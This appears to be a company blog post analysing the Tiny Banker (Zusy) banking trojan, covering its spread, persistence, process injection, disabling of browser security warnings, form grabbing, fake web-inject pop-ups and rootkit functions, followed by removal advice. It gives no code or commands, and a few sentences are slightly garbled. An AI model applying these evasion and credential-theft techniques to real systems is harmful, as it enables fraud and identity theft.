Tiny Banker, also called Tiny Banker or Zusy, is an example of a banking trojan, and by understanding Tiny Banker, we can understand the tactics, techniques, and procedures of banking trojans, as well as understanding how to detect and protect against them. Tiny Banker is an offshoot of the banking trojan line of malware which includes the Zeus trojan from which the name Zusy arises. First discovered in 2012, Tiny Banker’s goal, like all banking trojans, is to gather sensitive data from users including passwords, social security numbers, and banking information.
But Tiny Banker is SMALL; at about 20kb, it is a fraction of the size of the files it infects, making it difficult for anti-malware programs to detect the malicious code. As with most banking trojans, there are limited indications of compromise with a Tiny banker infection. Unless a banking trojan is so poorly written as to cause performance degradation on the victim PCs, the malware may be completely transparent to the user. Tiny Banker even disables security features in the browser to hide its actions.
The Tiny Banker Timeline
A 2012 Tiny Banker outbreak in Turkey hit approximately 60,000 systems. Other attacks were identified in the Czech Republic and the United States. In 2014 the source code for Tiny Banker was released on a malware website, and since then new iterations of this malware have continued to crop up leading to the name Tiny Banker one of its Top 10 Most Wanted malware in 2016.
How Tiny Banker Infiltrates
Tiny Banker was distributed via infected websites. Phishing emails and - advertising content that leads the user to a site hosting malicious code - were both used to lure victims to malicious sites. Once run on a vulnerable system, Tiny Banker initially copied itself to the % AppData % folder under the name bin.exe (Symantec, 2012). Different versions of Tiny Banker placed themselves in different folders under % AppData % with at least one variant creating a folder whose name was randomly generated using known information about the infected system and the Tiny Banker variant. This name in hex was also used to encrypt the Tiny Banker memory. Encrypting the malware memory is one way in which banking trojans like Tiny Banker attempt to avoid detection.
A registry entry is created to ensure bin.exe runs when the system restarts. This allows Tiny Banker to be persistent on the infected computer. Tiny Banker also modifies installed web browsers like Firefox and Internet Explorer to disable warning messages and allow the browser to display HTTP content on HTTPS websites without prompting. These are the very prompts and warnings that might alert the user to the presence of malicious code.
Tiny Banker injected malicious code into a variety of processes to maintain persistence and active infection. Tiny Banker targets the Windows processes explorer.exe and svchost.exe, as well as the browser processes: iexplore.exe, chrome.exe, and firefox.exe. Tiny Banker also targets any running processes, regardless of initial purpose, such that Tiny Banker becomes fully embedded in the victim PC.
Tiny banker uses encryption when it communicates with its command and control servers. Each instance of Tiny Banker is hardcoded with 4 domains for the C&C server so if one is unavailable, the malware can immediately attempt to connect to the next one. If Tiny Banker can’t connect to a C&C server, it will use the default config files included in the Tiny Banker download. Tiny Banker’s config file contains domains from which the malware will attempt to collect credentials and utilize in its Personal Identifying Information collecting scheme. Tiny Banker is hardcoded with some domains, like Facebook, Google, and Microsoft, and other domains are downloaded from the C&C server based on the location of the infected computer. Sites targeted by Tiny Banker include government portals and banking and financial institutions.
Tiny Banker steals Data in two ways. Man in the Browser attacks uses form grabs to intercept keystrokes before they can be encrypted for HTTPS websites. A web inject is when the malware modifies web browsers to serve fake pages or fake sections of pages, in response to legitimate requests from users. Tiny Banker gathers information on the layout, graphics, and design of targeted websites and then presents a pop-up designed to look like a legitimate site. The popup informs the user that the intended website is under constrictions and requests they enter sensitive data to verify their identities. Users are asked for financial information as well as identifying information such as social security numbers. Mother’s maiden name, a common security challenge question, is also often requested. Data stolen by Tiny Banker is sent back to the C&C.
During static analysis of the Tiny Banker source code, several interesting clues stood out. In the FormGrab windows executable file, the executables for each of the major windows web browsers are listed.
- Internet Explorer
This indicates that Tiny Banker will attempt to compromise each of these browsers with the web injects. In fact, in another ASM (Assembler language source) file, the full path to the default installation locations for each of these browser executables is listed. The code to modify the security settings to allow Firefox to display unsecured content on secured sites can also be seen in these files.
Within the source folder, there is a folder called -Rootkit. When opened (which can only be done by telling the analysis computer the relative location of the folder rather than just the folder name) this folder contains the functions for hiding processes, files, and registry entries on a Windows machine. These functions are clearly used to help Tiny Banker remain secret.
Finally, although much of Tiny Banker’s source code is annotated in English, some are not. Google translate identifies some of the comments and function titles as Russian, which makes sense, as Tiny Banker is thought to be a Russian product.
Since Tiny Banker injects malicious code into legitimate processes, cleaning Tiny Banker can be difficult. Most major anti-malware companies, like Malwarebytes, Symantec, and Windows Defender, offer Tiny Banker cleaning programs. Full system state backups can also be used to restore to a time before the infection. There are risks of going this route, however; a Tiny Banker infection may not be immediately apparent so selecting a restore point may be challenging. Also, any work or changes done since the restore point will be lost.
Tiny Banker, like all banking trojans, has limited indications of compromise. Its small size increases its ability to evade detection. Banking trojans can steal more than just money. They target personal identifying information, and Personal facts; data can be used to break into other accounts even at non-compromised institutions and to facilitate identity theft and credit card fraud. Having a reliable anti-malware program that does active scanning and keeping it up to date, is vital to prevent infections from trojans like Tiny Banker.
Need assistance with something else or want to read more informational content? Check out a few of our blogs below:
- Finding an AWS Resource Over All Regions
- New Ways to Combat Cyberattacks & Ransomware
- How Information Technology Improves Business Processes
- Ransomware in the News